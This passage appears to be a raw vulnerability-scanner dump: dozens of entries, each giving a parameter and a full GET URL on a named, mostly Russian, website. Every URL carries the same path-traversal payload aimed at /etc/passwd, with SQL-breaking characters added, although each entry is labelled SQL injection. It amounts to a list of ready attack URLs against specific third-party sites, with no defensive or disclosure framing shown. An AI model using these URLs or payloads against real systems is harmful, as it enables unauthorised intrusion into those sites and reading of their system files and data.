  1558. Vulnerability URL: http://www.mobu.ru/download.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&for=wav
  1559.  
  1560.  
  1561. Type: SQL Injection
  1562. Protocol: http
  1563. Verb: get
  1564. Parameter: id
  1565. Vulnerability URL: http://www.moj-lingvo-kurs.ru/RWlanguageschool.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1566.  
  1567.  
  1568. Type: SQL Injection
  1569. Protocol: http
  1570. Verb: get
  1571. Parameter: mode
  1572. Vulnerability URL: http://www.moreferatov.ru/?mode=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&pg=1
  1573.  
  1574.  
  1575. Type: SQL Injection
  1576. Protocol: http
  1577. Verb: get
  1578. Parameter: id
  1579. Vulnerability URL: http://www.mosteh.ru/?model=Miele+S+716&com=model&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1580.  
  1581.  
  1582. Type: SQL Injection
  1583. Protocol: http
  1584. Verb: get
  1585. Parameter: path
  1586. Vulnerability URL: http://www.mp3cd.ru/page.php?shop=in&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&element_id=4985
  1587.  
  1588.  
  1589. Type: SQL Injection
  1590. Protocol: http
  1591. Verb: get
  1592. Parameter: id
  1593. Vulnerability URL: http://www.mrdc.ru/homepage_rus.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1594.  
  1595.  
  1596. Type: SQL Injection
  1597. Protocol: http
  1598. Verb: get
  1599. Parameter: ref
  1600. Vulnerability URL: http://www.myragon.ru/?ref=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1601.  
  1602.  
  1603. Type: SQL Injection
  1604. Protocol: http
  1605. Verb: get
  1606. Parameter: MenuItem
  1607. Vulnerability URL: http://www.myshkin.ru/index.php?MenuItem=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1608.  
  1609.  
  1610. Type: SQL Injection
  1611. Protocol: http
  1612. Verb: get
  1613. Parameter: grid
  1614. Vulnerability URL: http://www.nbplaza.ru/show_cat2.php?grid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1615.  
  1616.  
  1617. Type: SQL Injection
  1618. Protocol: http
  1619. Verb: get
  1620. Parameter: sid
  1621. Vulnerability URL: http://www.newkurkino.ru/modules.php?sid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&name=News&file=article&op=modload
  1622.  
  1623.  
  1624. Type: SQL Injection
  1625. Protocol: http
  1626. Verb: get
  1627. Parameter: product
  1628. Vulnerability URL: http://www.newlife-m.ru/index.php?category=kacheli&product=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1629.  
  1630.  
  1631. Type: SQL Injection
  1632. Protocol: http
  1633. Verb: get
  1634. Parameter: category
  1635. Vulnerability URL: http://www.newlife-m.ru/index.php?category=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&product=detskie-napolnye-kacheli-standartnye-g-z
  1636.  
  1637.  
  1638. Type: SQL Injection
  1639. Protocol: http
  1640. Verb: get
  1641. Parameter: category
  1642. Vulnerability URL: http://www.newlife-m.ru/index.php?category=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1643.  
  1644.  
  1645. Type: SQL Injection
  1646. Protocol: http
  1647. Verb: get
  1648. Parameter: gallery
  1649. Vulnerability URL: http://www.niidokuchaeva.ru/?p=6&gallery=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1650.  
  1651.  
  1652. Type: SQL Injection
  1653. Protocol: http
  1654. Verb: get
  1655. Parameter: id
  1656. Vulnerability URL: http://www.nota-bene.ru/statpage.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1657.  
  1658.  
  1659. Type: SQL Injection
  1660. Protocol: http
  1661. Verb: get
  1662. Parameter: id
  1663. Vulnerability URL: http://www.nota-plus.ru/?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&act=product
  1664.  
  1665.  
  1666. Type: SQL Injection
  1667. Protocol: http
  1668. Verb: get
  1669. Parameter: lang
  1670. Vulnerability URL: http://www.nrmed.ru/index.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&link=contactsfilial-barklaya
  1671.  
  1672.  
  1673. Type: SQL Injection
  1674. Protocol: http
  1675. Verb: get
  1676. Parameter: part
  1677. Vulnerability URL: http://www.nva-korenevo.ru/index.php?part=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&language=rus
  1678.  
  1679.  
  1680. Type: SQL Injection
  1681. Protocol: http
  1682. Verb: get
  1683. Parameter: razdelID
  1684. Vulnerability URL: http://www.o-moloke.ru/index.php?razdelID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1685.  
  1686.  
  1687. Type: SQL Injection
  1688. Protocol: http
  1689. Verb: get
  1690. Parameter: gid
  1691. Vulnerability URL: http://www.offpoly.ru/shop?gid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1692.  
  1693.  
  1694. Type: SQL Injection
  1695. Protocol: http
  1696. Verb: get
  1697. Parameter: sect_id
  1698. Vulnerability URL: http://www.olimpciti.ru/catalog?sect_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1699.  
  1700.  
  1701. Type: SQL Injection
  1702. Protocol: http
  1703. Verb: get
  1704. Parameter: m
  1705. Vulnerability URL: http://www.omsk-parlament.ru/default.asp?objType=2&m=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&objValue=22832
  1706.  
  1707.  
  1708. Type: SQL Injection
  1709. Protocol: http
  1710. Verb: get
  1711. Parameter: m
  1712. Vulnerability URL: http://www.omsk-parlament.ru/default.asp?objType=2&m=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&objValue=22832
  1713.  
  1714.  
  1715. Type: SQL Injection
  1716. Protocol: http
  1717. Verb: get
  1718. Parameter: D
  1719. Vulnerability URL: http://www.oriflame-team.ru/?D=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1720.  
  1721.  
  1722. Type: SQL Injection
  1723. Protocol: http
  1724. Verb: get
  1725. Parameter: uid
  1726. Vulnerability URL: http://www.p-a-s-m.ru/galleryprofile.php?uid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1727.  
  1728.  
  1729. Type: SQL Injection
  1730. Protocol: http
  1731. Verb: get
  1732. Parameter: part1
  1733. Vulnerability URL: http://www.paoli.ru/rss_news.php?part1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1734.  
  1735.  
  1736. Type: SQL Injection
  1737. Protocol: http
  1738. Verb: get
  1739. Parameter: idparfum
  1740. Vulnerability URL: http://www.parfumprestige.ru/man.phtml?idparfum=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&letter=G&iddesigner=46
  1741.  
  1742.  
  1743. Type: SQL Injection
  1744. Protocol: http
  1745. Verb: get
  1746. Parameter: pid
  1747. Vulnerability URL: http://www.pastera.ru/index.php?p=product&pid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&sid=0
  1748.  
  1749.  
  1750. Type: SQL Injection
  1751. Protocol: http
  1752. Verb: get
  1753. Parameter: sid
  1754. Vulnerability URL: http://www.pastera.ru/index.php?p=product&pid=25787&sid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1755.  
  1756.  
  1757. Type: SQL Injection
  1758. Protocol: http
  1759. Verb: get
  1760. Parameter: n
  1761. Vulnerability URL: http://www.permoboz.ru/news0.php?n=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1762.  
  1763.  
  1764. Type: SQL Injection
  1765. Protocol: http
  1766. Verb: get
  1767. Parameter: pid
  1768. Vulnerability URL: http://www.portal-odincovo.ru/articles.php?pid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1769.  
  1770.  
  1771. Type: SQL Injection
  1772. Protocol: http
  1773. Verb: get
  1774. Parameter: id
  1775. Vulnerability URL: http://www.postbook.ru/detail.php?currKey=fX5nWWoAuuKxm2ZYZwKXGL4W&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1776.  
  1777.  
  1778. Type: SQL Injection
  1779. Protocol: http
  1780. Verb: get
  1781. Parameter: id
  1782. Vulnerability URL: http://www.postbranding.ru/mis.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1783.  
  1784.  
  1785. Type: SQL Injection
  1786. Protocol: http
  1787. Verb: get
  1788. Parameter: products_id
  1789. Vulnerability URL: http://www.priceguru.ru/product_info.php?cPath=68_207&products_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1790.  
  1791.  
  1792. Type: SQL Injection
  1793. Protocol: http
  1794. Verb: get
  1795. Parameter: id
  1796. Vulnerability URL: http://www.psor-center.ru/text.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1797.  
  1798.  
  1799. Type: SQL Injection
  1800. Protocol: http
  1801. Verb: get
  1802. Parameter: id
  1803. Vulnerability URL: http://www.ramu.ru/news-details.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1804.  
  1805.  
  1806. Type: SQL Injection
  1807. Protocol: http
  1808. Verb: get
  1809. Parameter: m_id
  1810. Vulnerability URL: http://www.rbsp.ru/view.php?m_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1811.  
  1812.  
  1813. Type: SQL Injection
  1814. Protocol: http
  1815. Verb: get
  1816. Parameter: unit
  1817. Vulnerability URL: http://www.rcdrive.ru/unit.php?unit=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1818.  
  1819.  
  1820. Type: SQL Injection
  1821. Protocol: http
  1822. Verb: get
  1823. Parameter: productID
  1824. Vulnerability URL: http://www.rdmarket.ru/index.php?productID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1825.  
  1826.  
  1827. Type: SQL Injection
  1828. Protocol: http
  1829. Verb: get
  1830. Parameter: id
  1831. Vulnerability URL: http://www.ria-arbitr.ru/moscow.htm?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1832.  
  1833.  
  1834. Type: SQL Injection
  1835. Protocol: http
  1836. Verb: get
  1837. Parameter: id
  1838. Vulnerability URL: http://www.rosmebel.ru/mdscr.asp?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1839.  
  1840.  
  1841. Type: SQL Injection
  1842. Protocol: http
  1843. Verb: get
  1844. Parameter: id
  1845. Vulnerability URL: http://www.rsbi-spb.ru/news.html?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1846.  
  1847.  
  1848. Type: SQL Injection
  1849. Protocol: http
  1850. Verb: get
  1851. Parameter: tab
  1852. Vulnerability URL: http://www.rsm-ural.ru/full.php?id=124&tab=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1853.  
  1854.  
  1855. Type: SQL Injection
  1856. Protocol: http
  1857. Verb: get
  1858. Parameter: key
  1859. Vulnerability URL: http://www.rubiempresa.net/esdevenimentdetall.asp?key=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1860.  
  1861.  
  1862. Type: SQL Injection
  1863. Protocol: http
  1864. Verb: get
  1865. Parameter: thema
  1866. Vulnerability URL: http://www.rudolfgoeser.de/themen.php?thema=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1867.  
  1868.  
  1869. Type: SQL Injection
  1870. Protocol: http
  1871. Verb: get
  1872. Parameter: t
  1873. Vulnerability URL: http://www.rueckenschnellhelfer.de/?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=6
  1874.  
  1875.  
  1876. Type: SQL Injection
  1877. Protocol: http
  1878. Verb: get
  1879. Parameter: id
  1880. Vulnerability URL: http://www.rueleon.tv/programme_lmp.php?Id=17&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1881.  
  1882.  
  1883. Type: SQL Injection
  1884. Protocol: http
  1885. Verb: get
  1886. Parameter: league
  1887. Vulnerability URL: http://www.rugbyweb.de/index.php?league=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1888.  
  1889.  
  1890. Type: SQL Injection
  1891. Protocol: http
  1892. Verb: get
  1893. Parameter: t
  1894. Vulnerability URL: http://www.rus-hidromek.ru/sale.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1895.  
  1896.  
  1897. Type: SQL Injection
  1898. Protocol: http
  1899. Verb: get
  1900. Parameter: id
  1901. Vulnerability URL: http://www.russianclub.ge/index.php?Itemid=52&task=detail&option=com_jooget&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1902.  
  1903.  
  1904. Type: SQL Injection
  1905. Protocol: http
  1906. Verb: get
  1907. Parameter: h
  1908. Vulnerability URL: http://www.sale.volgograd.ru/index.php?h=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&vm=1&act=announview
  1909.  
  1910.  
  1911. Type: SQL Injection
  1912. Protocol: http
  1913. Verb: get
  1914. Parameter: id
  1915. Vulnerability URL: http://www.sampages.ru/index.php?s_type=11&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1916.  
  1917.  
  1918. Type: SQL Injection
  1919. Protocol: http
  1920. Verb: get
  1921. Parameter: id
  1922. Vulnerability URL: http://www.santa-barbara.ru/music.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&inc=download
  1923.  
  1924.  
  1925. Type: SQL Injection
  1926. Protocol: http
  1927. Verb: get
  1928. Parameter: id
  1929. Vulnerability URL: http://www.santeh-servis.ru/?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&module=articles
  1930.  
  1931.  
  1932. Type: SQL Injection
  1933. Protocol: http
  1934. Verb: get
  1935. Parameter: cat
  1936. Vulnerability URL: http://www.sekretno.ru/index.php?cat=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1937.  
  1938.  
  1939. Type: SQL Injection
  1940. Protocol: http
  1941. Verb: get
  1942. Parameter: country_id
  1943. Vulnerability URL: http://www.ski-tours.ru/index.php?country_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&act=offer_list
  1944.  
  1945.  
  1946. Type: SQL Injection
  1947. Protocol: http
  1948. Verb: get
  1949. Parameter: id_refer
  1950. Vulnerability URL: http://www.softsnab.ru/?id_refer=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1951.  
  1952.  
  1953. Type: SQL Injection
  1954. Protocol: http
  1955. Verb: get
  1956. Parameter: p
  1957. Vulnerability URL: http://www.scubacenter.ru/?a=detail&p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=33
  1958.  
  1959.  
  1960. Type: SQL Injection
  1961. Protocol: http
  1962. Verb: get
  1963. Parameter: id
  1964. Vulnerability URL: http://www.scubacenter.ru/?a=detail&p=travels&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1965.  
  1966.  
  1967. Type: SQL Injection
  1968. Protocol: http
  1969. Verb: get
  1970. Parameter: razdel
  1971. Vulnerability URL: http://www.solo-k.ru/price.php?razdel=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&sub_razdel=2&type_id=1213651914
  1972.  
  1973.  
  1974. Type: SQL Injection
  1975. Protocol: http
  1976. Verb: get
  1977. Parameter: pg
  1978. Vulnerability URL: http://www.ssteh.ru/index.php?pg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1979.  
  1980.  
  1981. Type: SQL Injection
  1982. Protocol: http
  1983. Verb: get
  1984. Parameter: page_id
  1985. Vulnerability URL: http://www.stroits.spb.ru/index.php?page_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  1986.  
  1987.  
  1988. Type: SQL Injection
  1989. Protocol: http
  1990. Verb: get
  1991. Parameter: in_page
  1992. Vulnerability URL: http://www.suvenirow.ru/prof.php?show_pic=90&in_page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&refro=yes
  1993.  
  1994.  
  1995. Type: SQL Injection
  1996. Protocol: http
  1997. Verb: get
  1998. Parameter: group
  1999. Vulnerability URL: http://www.sweettoys.ru/index?group=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2000.  
  2001.  
  2002. Type: SQL Injection
  2003. Protocol: http
  2004. Verb: get
  2005. Parameter: page_id
  2006. Vulnerability URL: http://www.t-lc.ru/index.php?page_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2007.  
  2008.  
  2009. Type: SQL Injection
  2010. Protocol: http
  2011. Verb: get
  2012. Parameter: id_country
  2013. Vulnerability URL: http://www.tbmos.ru/i3.asp?id_country=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2014.  
  2015.  
  2016. Type: SQL Injection
  2017. Protocol: http
  2018. Verb: get
  2019. Parameter: id_podrazdel
  2020. Vulnerability URL: http://www.techstore.ru/?action=print_info_tovar&id_podrazdel=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id_tovar=24
  2021.  
  2022.  
  2023. Type: SQL Injection
  2024. Protocol: http
  2025. Verb: get
  2026. Parameter: table
  2027. Vulnerability URL: http://www.rosalcohol.ru/site.php?table=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&id=5319
  2028.  
  2029.  
  2030. Type: SQL Injection
  2031. Protocol: http
  2032. Verb: get
  2033. Parameter: id
  2034. Vulnerability URL: http://www.rosalcohol.ru/site.php?table=bmV3c19nbGF2&id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2035.  
  2036.  
  2037. Type: SQL Injection
  2038. Protocol: http
  2039. Verb: get
  2040. Parameter: menu_id
  2041. Vulnerability URL: http://www.tehenergoholding.ru/index.php?menu_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&menu_parent_id=0
  2042.  
  2043.  
  2044. Type: SQL Injection
  2045. Protocol: http
  2046. Verb: get
  2047. Parameter: id
  2048. Vulnerability URL: http://www.telehit.ru/article_cat.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2049.  
  2050.  
  2051. Type: SQL Injection
  2052. Protocol: http
  2053. Verb: get
  2054. Parameter: p
  2055. Vulnerability URL: http://www.tkdialog.ru/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2056.  
  2057.  
  2058. Type: SQL Injection
  2059. Protocol: http
  2060. Verb: get
  2061. Parameter: l
  2062. Vulnerability URL: http://www.tonnel.ru/?l=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C&uid=1046
  2063.  
  2064.  
  2065. Type: SQL Injection
  2066. Protocol: http
  2067. Verb: get
  2068. Parameter: l
  2069. Vulnerability URL: http://www.tonnel.ru/?l=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23--%27%40%21%5C
  2070.  
  2071.  
  2072. Type: SQL Injection
  2073. Protocol: http
  2074. Verb: get
  2075. Parameter: did
